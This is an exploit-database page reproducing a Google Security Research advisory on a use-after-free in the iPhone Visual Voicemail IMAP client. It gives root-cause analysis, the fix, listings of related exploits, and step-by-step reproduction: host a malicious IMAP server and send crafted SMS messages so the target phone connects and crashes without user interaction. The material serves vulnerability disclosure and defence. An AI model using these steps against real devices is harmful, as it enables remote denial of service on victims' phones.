Menu

"Visual Voicemail for iPhone - IMAP NAMESPACE Processing Use-After-Free"

Author

"Google Security Research"

Platform

ios

Release date

2019-05-23

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
Visual Voicemail (VVM) is a feature of mobile devices that allows voicemail to be read in an email-like format. Carriers set up a Visual Voicemail server that supports IMAP, and the device queries this server for new email. Visual Voicemail is configured over SMS, and carriers inform devices of the location of the IMAP server by sending a specially formatted SMS message containing the URL of the IMAP server.

SMS messages are determined to be VVM-related based on their PID field as well as their contents. Both of these fields can be set by a device sending SMS messages, so any device can send a message that causes Visual Voicemail to query an IMAP server specified in the message. This means that an attacker can force a device to query an IMAP server they control without the user interacting with the device in any way.

There is an object lifetime issue in the iPhone IMAP client that can be accessed in this way. It happens when a NAMESPACE command response contains a namespace that cannot be parsed correctly. It leads to the mailbox separator being freed, but not replaced with a valid object. This leads to a selector being called on an object that is not valid.

To reproduce this issue:

1) Run testcrash.py on a remotely accessible server. To run on port 993, this will need to be on a server that has a domain name, and a certificate that verifies correctly. Replace the "YOUR KEY HERE" fields in testcrash.py with the location of the cert files. On some carriers, it is possible to use port 143 without SSL instead.

2) Send the attached SMS messages to the device, first statepdu.txt and then mboxupdatepdu.txt. Replace the destination number and server location in the messages with the location of your target device and server before sending.

3) The device will connect to the server, and then crash

Note that this attack depends somewhat on the carrier the device is on. I tested this issue on an AT&T SIM. I was not able to reproduce this issue on a T-Mobile SIM, because their network does not allow VVM connections to outside servers. It might be possible to bypass this by hosting the server on a peer device on the network, but I didn't try this. The PID used for VVM SMS messages also varies based on carrier.

I've attached a crash log for this issue. I've also attached decoded.txt, which describes the contents of the SMS pdus, and NAMESPACE.zip, which is a non-minimized PoC that leaders to a wider variety of crashes.

When retrieving a message, the VVM client calls [IMAPAccount _updateSeparatorAndNamespaceWithConnection:] to get the server separator and namespace prefix. This method first retrieves the server separator by calling [MFIMAPConnection separatorChar] which causes the LIST command to be sent to the server, and returns the separator. The method also stores the separator as a member of the connection object, which gives the separator its sole reference. [IMAPAccount _updateSeparatorAndNamespaceWithConnection:]  then calls [MFIMAPConnection serverPathPrefix] to get the prefix,  which in turn calls [MFIMAPConnection _doNamespaceCommand] to perform the NAMESPACE command over the network. If this command fails for any reason (for example, malformed response, LOGOUT command, etc.), it will call [MFIMAPConnection disconnectAndNotifyDelegate:], which removes the separator from the connection object, removing its only reference. The rest of [IMAPAccount _updateSeparatorAndNamespaceWithConnection:]  will then use a separator object that has been freed.

This issue was resolved by adding a lock to [IMAPAccount _updateSeparatorAndNamespaceWithConnection:]  and [MFIMAPConnection disconnectAndNotifyDelegate:] so that they cannot run at the same time for the same connection.

This issue was fixed on Tuesday, May 14


Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46913.zip
Release Date Title Type Platform Author
2019-05-23 "Visual Voicemail for iPhone - IMAP NAMESPACE Processing Use-After-Free" dos ios "Google Security Research"
2019-05-06 "iOS 12.1.3 - 'cfprefsd' Memory Corruption" dos ios ZecOps
2018-11-06 "FaceTime - RTP Video Processing Heap Corruption" dos ios "Google Security Research"
2018-01-08 "Photos in Wifi 1.0.1 - Path Traversal" webapps ios Vulnerability-Lab
2017-02-21 "Lock Photos Album&Videos Safe 4.3 - Directory Traversal" webapps ios Vulnerability-Lab
2017-02-20 "Album Lock 4.0 iOS - Directory Traversal" webapps ios Vulnerability-Lab
2016-04-25 "C/C++ Offline Compiler and C For OS - Persistent Cross-Site Scripting" webapps ios Vulnerability-Lab
2016-01-27 "Secure Item Hub 1.0 iOS - Multiple Vulnerabilities" webapps ios Vulnerability-Lab
2015-09-28 "Photos in Wifi 1.0.1 iOS - Arbitrary File Upload" webapps ios Vulnerability-Lab
2015-09-28 "My.WiFi USB Drive 1.0 iOS - Local File Inclusion" webapps ios Vulnerability-Lab
2015-09-22 "Air Drive Plus 2.4 - Arbitrary File Upload" webapps ios Vulnerability-Lab
2015-08-12 "Printer Pro 5.4.3 IOS - Persistent Cross-Site Scripting" webapps ios "Taurus Omar"
2015-07-05 "WK UDID 1.0.1 iOS - Command Injection" webapps ios Vulnerability-Lab
2016-02-22 "InstantCoder 1.0 iOS - Multiple Vulnerabilities" webapps ios Vulnerability-Lab
2015-06-06 "WiFi HD 8.1 - Directory Traversal / Denial of Service" webapps ios "Wh1t3Rh1n0 (Michael Allen)"
2015-05-18 "Wireless Photo Transfer 3.0 iOS - Local File Inclusion" webapps ios Vulnerability-Lab
2015-05-07 "Album Streamer 2.0 iOS - Directory Traversal" webapps ios Vulnerability-Lab
2015-05-06 "PDF Converter & Editor 2.1 iOS - Local File Inclusion" webapps ios Vulnerability-Lab
2015-05-06 "vPhoto-Album 4.2 iOS - Local File Inclusion" webapps ios Vulnerability-Lab
2015-05-04 "PhotoWebsite 3.1 iOS - Local File Inclusion" webapps ios Vulnerability-Lab
2015-04-21 "Photo Manager Pro 4.4.0 iOS - Code Execution" webapps ios Vulnerability-Lab
2015-04-21 "Mobile Drive HD 1.8 - Local File Inclusion" webapps ios Vulnerability-Lab
2015-04-21 "Photo Manager Pro 4.4.0 iOS - Local File Inclusion" webapps ios Vulnerability-Lab
2015-04-21 "Wifi Drive Pro 1.2 iOS - Local File Inclusion" webapps ios Vulnerability-Lab
2015-01-13 "Foxit MobilePDF 4.4.0 iOS - Multiple Vulnerabilities" webapps ios Vulnerability-Lab
2014-10-27 "Folder Plus 2.5.1 iOS - Persistent Cross-Site Scripting" webapps ios Vulnerability-Lab
2014-10-27 "WebDisk+ 2.1 iOS - Code Execution" webapps ios Vulnerability-Lab
2014-10-22 "File Manager 4.2.10 iOS - Code Execution" webapps ios Vulnerability-Lab
2014-10-22 "iFunBox Free 1.1 iOS - Local File Inclusion" webapps ios Vulnerability-Lab
2014-10-15 "Indeed Job Search 2.5 iOS API - Multiple Vulnerabilities" webapps ios Vulnerability-Lab
Release Date Title Type Platform Author
2019-08-15 "Microsoft Windows Text Services Framework MSCTF - Multiple Vulnerabilities" local windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Double Free due to Malformed JP2 Stream" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - free() of Uninitialized Pointer due to Malformed JBIG2Globals Stream" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Heap-Based Buffer Overflow due to Malformed JP2 Stream" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Heap-Based Memory Corruption due to Malformed TTF Font" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Heap-Based Buffer Overflow in CoolType.dll" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Heap-Based Buffer Overflow due to Malformed Font Stream" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Static Buffer Overflow due to Malformed Font Stream" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Heap-Based Buffer Overflow While Processing Malformed PDF" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Use-After-Free due to Malformed JP2 Stream" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Heap-Based Out-of-Bounds read due to Malformed JP2 Stream" dos windows "Google Security Research"
2019-08-15 "Microsoft Font Subsetting - DLL Heap-Based Out-of-Bounds read in FixSbitSubTableFormat1" dos windows "Google Security Research"
2019-08-15 "Microsoft Font Subsetting - DLL Heap Corruption in MakeFormat12MergedGlyphList" dos windows "Google Security Research"
2019-08-15 "Microsoft Font Subsetting - DLL Heap-Based Out-of-Bounds read in WriteTableFromStructure" dos windows "Google Security Research"
2019-08-15 "Microsoft Font Subsetting - DLL Heap Corruption in ReadAllocFormat12CharGlyphMapList" dos windows "Google Security Research"
2019-08-15 "Microsoft Font Subsetting - DLL Heap Corruption in ReadTableIntoStructure" dos windows "Google Security Research"
2019-08-15 "Microsoft Font Subsetting - DLL Heap Corruption in FixSbitSubTables" dos windows "Google Security Research"
2019-08-15 "Microsoft Font Subsetting - DLL Double Free in MergeFormat12Cmap / MakeFormat12MergedGlyphList" dos windows "Google Security Research"
2019-08-15 "Microsoft Font Subsetting - DLL Heap-Based Out-of-Bounds read in GetGlyphIdx" dos windows "Google Security Research"
2019-08-15 "Microsoft Font Subsetting - DLL Returning a Dangling Pointer via MergeFontPackage" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat CoolType (AFDKO) - Call from Uninitialized Memory due to Empty FDArray in Type 1 Fonts" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat CoolType (AFDKO) - Memory Corruption in the Handling of Type 1 Font load/store Operators" dos windows "Google Security Research"
2019-08-15 "NSKeyedUnarchiver - Info Leak in Decoding SGBigUTF8String" dos multiple "Google Security Research"
2019-08-12 "WebKit - UXSS via XSLT and Nested Document Replacements" dos multiple "Google Security Research"
2019-08-12 "Linux - Use-After-Free Reads in show_numa_stats()" dos linux "Google Security Research"
2019-08-07 "Google Chrome 74.0.3729.0 / 76.0.3789.0 - Heap Use-After-Free in blink::PresentationAvailabilityState::UpdateAvailability" dos multiple "Google Security Research"
2019-08-05 "macOS iMessage - Heap Overflow when Deserializing" dos macos "Google Security Research"
2019-07-30 "iMessage - NSKeyedUnarchiver Deserialization Allows file Backed NSData Objects" dos multiple "Google Security Research"
2019-07-30 "iMessage - Memory Corruption when Decoding NSKnownKeysDictionary1" dos multiple "Google Security Research"
2019-07-30 "iMessage - NSArray Deserialization can Invoke Subclass that does not Retain References" dos multiple "Google Security Research"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46913/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/46913/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/46913/41326/visual-voicemail-for-iphone-imap-namespace-processing-use-after-free/download/", "exploit_id": "46913", "exploit_description": "\"Visual Voicemail for iPhone - IMAP NAMESPACE Processing Use-After-Free\"", "exploit_date": "2019-05-23", "exploit_author": "\"Google Security Research\"", "exploit_type": "dos", "exploit_platform": "ios", "exploit_port": null}
                                            

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Browse exploit APIBrowse